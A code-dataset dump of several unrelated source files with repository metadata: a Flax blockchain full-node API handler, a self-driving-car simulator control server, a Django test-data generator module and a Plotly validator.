if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes([0] * 32)
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSFlaxConnection
) -> Optional[Message]:
"""
Signature of header hash, by the harvester. This is enough to create an unfinished
block, which only needs a Proof of Time to be finished. If the signature is valid,
we call the unfinished_block routine.
"""
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSFlaxConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or block.height > self.full_node.blockchain.get_peak_height()
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction) -> Optional[Message]:
spend_name = request.transaction.name()
status, error = await self.full_node.respond_transaction(request.transaction, spend_name)
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
# If if failed/pending, but it previously succeeded (in mempool), this is idempotence, return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash = self.full_node.blockchain.height_to_hash(height)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes = []
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(self.full_node.blockchain.height_to_hash(uint32(i)))
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
async def new_compact_vdf(self, request: full_node_protocol.NewCompactVDF, peer: ws.WSFlaxConnection):
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.compact_vdf_lock:
await self.full_node.new_compact_vdf(request, peer)
@peer_required
@api_request
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSFlaxConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSFlaxConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
| 47.555556
| 120
| 0.64069
|
3bdce29883d28edc1f06783c61b228d180582d72
| 4,464
|
py
|
Python
|
drive.py
|
terrylu87/CarND-Behavioral-Cloning-P3
|
2f2adde44e906995405fb6ea04beafbb2ec1381f
|
[
"MIT"
] | null | null | null |
drive.py
|
terrylu87/CarND-Behavioral-Cloning-P3
|
2f2adde44e906995405fb6ea04beafbb2ec1381f
|
[
"MIT"
] | null | null | null |
drive.py
|
terrylu87/CarND-Behavioral-Cloning-P3
|
2f2adde44e906995405fb6ea04beafbb2ec1381f
|
[
"MIT"
] | null | null | null |
import argparse
import base64
from datetime import datetime
import os
import shutil
import numpy as np
import socketio
import eventlet
import eventlet.wsgi
from PIL import Image
from flask import Flask
from io import BytesIO
import cv2
from keras.models import load_model
import h5py
from keras import __version__ as keras_version
sio = socketio.Server()
app = Flask(__name__)
model = None
prev_image_array = None
class SimplePIController:
def __init__(self, Kp, Ki):
self.Kp = Kp
self.Ki = Ki
self.set_point = 0.
self.error = 0.
self.integral = 0.
def set_desired(self, desired):
self.set_point = desired
def update(self, measurement):
# proportional error
self.error = self.set_point - measurement
# integral error
self.integral += self.error
return self.Kp * self.error + self.Ki * self.integral
controller = SimplePIController(0.1, 0.002)
set_speed = 9
controller.set_desired(set_speed)
def shrink(a, S=2): # S : shrink factor
new_shp = np.vstack((np.array(a.shape)//S,[S]*a.ndim)).ravel('F')
return a.reshape(new_shp).mean(tuple(1+2*np.arange(a.ndim)))
@sio.on('telemetry')
def telemetry(sid, data):
if data:
# The current steering angle of the car
steering_angle = data["steering_angle"]
# The current throttle of the car
throttle = data["throttle"]
# The current speed of the car
speed = data["speed"]
# The current image from the center camera of the car
imgString = data["image"]
image = Image.open(BytesIO(base64.b64decode(imgString)))
#image = image.resize((160, 80),Image.ANTIALIAS)
image = image.resize((160, 80))
image_array = np.asarray(image)
# resize image
#image_array = np.asarray(timage)
# Convert RGB to BGR
#print(image.shape)
#print(timage.shape)
#print(image_array.shape)
#image_array = np.array(cv_image)
#steering_angle = float(model.predict(image_array, batch_size=1))
steering_angle = float(model.predict(image_array[None, :, :, :], batch_size=1))
throttle = controller.update(float(speed))
print(steering_angle, throttle)
send_control(steering_angle, throttle)
# save frame
if args.image_folder != '':
timestamp = datetime.utcnow().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3]
image_filename = os.path.join(args.image_folder, timestamp)
image.save('{}.jpg'.format(image_filename))
else:
# NOTE: DON'T EDIT THIS.
sio.emit('manual', data={}, skip_sid=True)
@sio.on('connect')
def connect(sid, environ):
print("connect ", sid)
send_control(0, 0)
def send_control(steering_angle, throttle):
sio.emit(
"steer",
data={
'steering_angle': steering_angle.__str__(),
'throttle': throttle.__str__()
},
skip_sid=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument(
'model',
type=str,
help='Path to model h5 file. Model should be on the same path.'
)
parser.add_argument(
'image_folder',
type=str,
nargs='?',
default='',
help='Path to image folder. This is where the images from the run will be saved.'
)
args = parser.parse_args()
# check that model Keras version is same as local Keras version
f = h5py.File(args.model, mode='r')
model_version = f.attrs.get('keras_version')
keras_version = str(keras_version).encode('utf8')
if model_version != keras_version:
print('You are using Keras version ', keras_version,
', but the model was built using ', model_version)
model = load_model(args.model)
if args.image_folder != '':
print("Creating image folder at {}".format(args.image_folder))
if not os.path.exists(args.image_folder):
os.makedirs(args.image_folder)
else:
shutil.rmtree(args.image_folder)
os.makedirs(args.image_folder)
print("RECORDING THIS RUN ...")
else:
print("NOT RECORDING THIS RUN ...")
# wrap Flask application with engineio's middleware
app = socketio.Middleware(sio, app)
# deploy as an eventlet WSGI server
eventlet.wsgi.server(eventlet.listen(('', 4567)), app)
| 28.8
| 89
| 0.634409
|
4559121f9f16189e0b3cc9278a4411d4c99476bd
| 3,149
|
py
|
Python
|
model_mommy/generators.py
|
GradConnection/model_mommy
|
520de3c6bb79aadbaa3594f2677e0e2b7816c4ea
|
[
"Apache-2.0"
] | null | null | null |
model_mommy/generators.py
|
GradConnection/model_mommy
|
520de3c6bb79aadbaa3594f2677e0e2b7816c4ea
|
[
"Apache-2.0"
] | null | null | null |
model_mommy/generators.py
|
GradConnection/model_mommy
|
520de3c6bb79aadbaa3594f2677e0e2b7816c4ea
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
Generators are callables that return a value used to populate a field.
If this callable has a `required` attribute (a list, mostly), for each item in
the list, if the item is a string, the field attribute with the same name will
be fetched from the field and used as argument for the generator. If it is a
callable (which will receive `field` as first argument), it should return a
list in the format (key, value) where key is the argument name for generator
and value is the value for that argument.
"""
import string
from decimal import Decimal
from os.path import abspath, join, dirname
from random import randint, choice, random
from django import VERSION
from django.contrib.contenttypes.models import ContentType
from django.core.files.base import ContentFile
from django.db.models import get_models
from model_mommy.timezone import now
MAX_LENGTH = 300
# Using sys.maxint here breaks a bunch of tests when running against a
# Postgres database.
MAX_INT = 10000
def get_content_file(content, name):
if VERSION < (1, 4):
return ContentFile(content)
else:
return ContentFile(content, name=name)
def gen_file_field():
name = u'mock_file.txt'
file_path = abspath(join(dirname(__file__), name))
with open(file_path, 'rb') as f:
return get_content_file(f.read(), name=name)
def gen_image_field():
name = u'mock-img.jpeg'
file_path = abspath(join(dirname(__file__), name))
with open(file_path, 'rb') as f:
return get_content_file(f.read(), name=name)
def gen_from_list(L):
'''Makes sure all values of the field are generated from the list L
Usage:
from mommy import Mommy
class KidMommy(Mommy):
attr_mapping = {'some_field':gen_from_list([A, B, C])}
'''
return lambda: choice(L)
# -- DEFAULT GENERATORS --
def gen_from_choices(C):
choice_list = map(lambda x: x[0], C)
return gen_from_list(choice_list)
def gen_integer(min_int=-MAX_INT, max_int=MAX_INT):
return randint(min_int, max_int)
def gen_float():
return random() * gen_integer()
def gen_decimal(max_digits, decimal_places):
num_as_str = lambda x: ''.join([str(randint(0, 9)) for i in range(x)])
return Decimal("%s.%s" % (num_as_str(max_digits - decimal_places),
num_as_str(decimal_places)))
gen_decimal.required = ['max_digits', 'decimal_places']
def gen_date():
return now().date()
def gen_datetime():
return now()
def gen_time():
return now().time()
def gen_string(max_length):
return u''.join(choice(string.ascii_letters) for i in range(max_length))
gen_string.required = ['max_length']
def gen_slug(max_length=50):
valid_chars = string.letters + string.digits + '_-'
return u''.join(choice(valid_chars) for i in range(max_length))
def gen_text():
return gen_string(MAX_LENGTH)
def gen_boolean():
return choice((True, False))
def gen_url():
return u'http://www.%s.com' % gen_string(30)
def gen_email():
return u"%s@example.com" % gen_string(10)
def gen_content_type():
return ContentType.objects.get_for_model(choice(get_models()))
| 26.024793
| 78
| 0.705621
|
fdef21ffa4b9bc2971773a0134b51a13a04b4687
| 420
|
py
|
Python
|
env/Lib/site-packages/plotly/validators/scatter/_hovertemplatesrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/Lib/site-packages/plotly/validators/scatter/_hovertemplatesrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/Lib/site-packages/plotly/validators/scatter/_hovertemplatesrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class HovertemplatesrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="hovertemplatesrc", parent_name="scatter", **kwargs):
super(HovertemplatesrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
| 35
| 88
| 0.692857
|
36ea597065c36bdfe1567ced706f0a5f2b3bd875
| 8,844
|
py
|
Python
|
AcadeMeData/models.py
|
DeanCivlin/AcadeMe
|
33c4f635506c3327db510da0f26c822db3dd848d
|
[
"MIT"
] | null | null | null |
AcadeMeData/models.py
|
DeanCivlin/AcadeMe
|
33c4f635506c3327db510da0f26c822db3dd848d
|
[
"MIT"
] | null | null | null |
AcadeMeData/models.py
|
DeanCivlin/AcadeMe
|
33c4f635506c3327db510da0f26c822db3dd848d
|
[
"MIT"
] | null | null | null |
from django.db import models, transaction
from django.conf import settings
from django.contrib.auth.models import User as DjangoUser
from django.core.validators import MinValueValidator, MaxValueValidator
from django.utils import timezone
class DEGREECHOICES(models.TextChoices):
Computer_Science = 'CS', 'Computer Science'
Psychology = 'PS', 'Psychology'
GOVERNMENT = 'GV', 'Government'
Business_Administration = 'BA', 'Business Administration'
Unknown = 'UN', 'Unknown'
class UNIVERSITYCHOICES(models.TextChoices):
Reichman_University = 'RU', 'Reichman University'
Hebrew_University = 'HU', 'Hebrew University'
Tel_Aviv_University = 'TA', 'Tel Aviv University'
Beer_Sheva_University = 'BS', "Be'er Sheva University"
Unknown = 'UN', 'Unknown'
class User(models.Model):
# The AUTH_USER_MODEL is the built in user model from django
# Goto: https://docs.djangoproject.com/en/3.2/ref/contrib/auth/ for API
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, primary_key=True)
# name = models.CharField(max_length=30, default="") # we got the name\username from the built in user model django
university = models.CharField(max_length=2, choices=UNIVERSITYCHOICES.choices, default=UNIVERSITYCHOICES.Unknown)
degree = models.CharField(max_length=2, choices=DEGREECHOICES.choices, default=DEGREECHOICES.Unknown)
@staticmethod
def create_user(username, email, password, university, degree):
django_user = DjangoUser.objects.create_user(username=username,
email=email,
password=password)
user = User(user=django_user,
university=university,
degree=degree)
user.save()
return user
@staticmethod
def del_user(self):
try:
self.user.delete()
except User.DoesNotExist:
return False
return True
@staticmethod
def get_user(username):
try:
user = DjangoUser.objects.get(username=username)
except DjangoUser.DoesNotExist:
return None
return user
class Degree(models.Model):
degree_id = models.IntegerField(primary_key=True, validators=[MinValueValidator(0)], default=0)
name = models.CharField(max_length=100)
universities = models.TextField(null=True, blank=True) # Format should be "Uni1, Uni2, Uni3,..."
description = models.TextField(null=True, blank=True) # Describes the degree
# methods
def __str__(self):
"""
Returns the name of all possible degrees in the database.
"""
return self.name
@staticmethod
def create_degree(degree_id, name, universities, description):
"""
Creates a Degree object.
"""
degree = Degree(degree_id=degree_id, name=name, universities=universities, description=description)
degree.save()
return degree
@staticmethod
def get_degree_by_name(name):
"""
Gets us the Degree object with input 'name' as its name.
"""
try:
degree = Degree.objects.get(name=name)
except Degree.DoesNotExist:
return None
return degree
class University(models.Model):
university_id = models.IntegerField(
primary_key=True, validators=[MinValueValidator(0)])
name = models.CharField(max_length=100)
location = models.CharField(max_length=100)
# maybe change here to: description = models.TextField()
description = models.TextField(null=True, blank=True)
def __str__(self):
return self.name
@staticmethod
def get_university_by_name(name):
# gets the relevant university that match the given name
return University.objects.get(name=name)
@staticmethod
def get_university_by_location(location):
# gets the relevant university that match the given location
return University.objects.get(location=location)
class Professor(models.Model):
professor_id = models.IntegerField(primary_key=True, validators=[MinValueValidator(0)])
name = models.CharField(max_length=100)
university = models.ForeignKey(University, on_delete=models.RESTRICT) # , related_name='%(class)s_something')
description = models.TextField(null=True, blank=True)
rate = models.DecimalField(max_digits=2, decimal_places=1, validators=[MinValueValidator(1), MaxValueValidator(5)],
blank=True, null=True) # average professor rating, starts as null
def __str__(self):
return self.name
@staticmethod
def create_professor(professor_id, name, university, description, rate):
professor = Professor(professor_id=professor_id,
name=name,
university=university,
description=description,
rate=rate)
professor.save()
return professor
@staticmethod
def get_professor(name):
try:
professor = Professor.objects.get(name=name)
except professor.DoesNotExist:
return None
return professor
def get_name(self):
return self.name
def get_description(self):
return self.description
class Course(models.Model):
course_id = models.IntegerField(primary_key=True, validators=[MinValueValidator(0)], default=0)
name = models.CharField(max_length=100, unique=True)
degree = models.ManyToManyField(Degree)
mandatory = models.BooleanField(default=False) # False for elective, True for mandatory
description = models.TextField(null=True, blank=True)
professor = models.ForeignKey(Professor, on_delete=models.RESTRICT)
university = models.ForeignKey(University, on_delete=models.RESTRICT)
@staticmethod
def create_course(course_id, name, degree, mandatory, description, professor, university):
"""
Creates a Course object.
"""
course = Course(course_id=course_id,
name=name,
mandatory=mandatory,
description=description,
professor=professor,
university=university)
course.degree.add(degree)
course.save()
return course
def __str__(self):
return self.name
@staticmethod
def get_course_by_name(name):
"""
Gets us the Degree object with input 'name' as its name.
"""
try:
course = Course.objects.get(name=name)
return course
except Course.DoesNotExist:
return None
def course_belongs(self, university, degree):
"""
returns if course belongs to this degree in this university
"""
return degree in self.degree.all() and university == self.university
class MessageBoards(models.Model):
id = models.IntegerField(primary_key=True)
courseName = models.ForeignKey(Course, null=False, blank=True, on_delete=models.CASCADE, default=0)
def __str__(self):
return self.id
@staticmethod
def create_msgboard(id, courseName):
msgboard = MessageBoards(id=id, courseName=courseName)
msgboard.save()
return msgboard
@staticmethod
def get_msgboard_by_id(id):
return MessageBoards.objects.get(id=id)
@staticmethod
def get_msgboard_by_course(course):
return MessageBoards.objects.get(courseName=course)
class Messages(models.Model):
msgID = models.IntegerField(primary_key=True)
userID = models.ForeignKey(User, on_delete=models.CASCADE, default=0)
text = models.TextField(max_length=300)
msgDate = models.DateTimeField(default=timezone.now)
board = models.ForeignKey(MessageBoards, on_delete=models.CASCADE, default=1)
def get_msg(self):
return self.msgID
def create_message(id, user, text, board):
with transaction.atomic():
msg = Messages(msgID=id, userID=user, text=text, board=board)
msg.save()
return msg
@staticmethod
def get_msg_by_id(msgID):
return Messages.objects.get(msgID=msgID)
class MessageTags(models.Model):
id = models.IntegerField(primary_key=True, default=0)
msg = models.ForeignKey(Messages, on_delete=models.CASCADE)
userID = models.ForeignKey(User, on_delete=models.CASCADE)
def create_msgtag(id, msg, userID):
with transaction.atomic():
tag = MessageTags(id=id, msg=msg, userID=userID)
tag.save()
return tag
def __str__(self):
return self.id
def get_msg_tag(id):
return MessageTags.objects.get(id=id)
| 34.27907
| 120
| 0.656151
|
ef9316722e7ddcdc58e2b7936e42f8b2abe45f1e
| 309
|
py
|
Python
|
books/admin.py
|
devsingh-code/django-digital-marketplace
|
f0f0d2daebaeedeb7ff5b83154313fcce21b2886
|
[
"MIT"
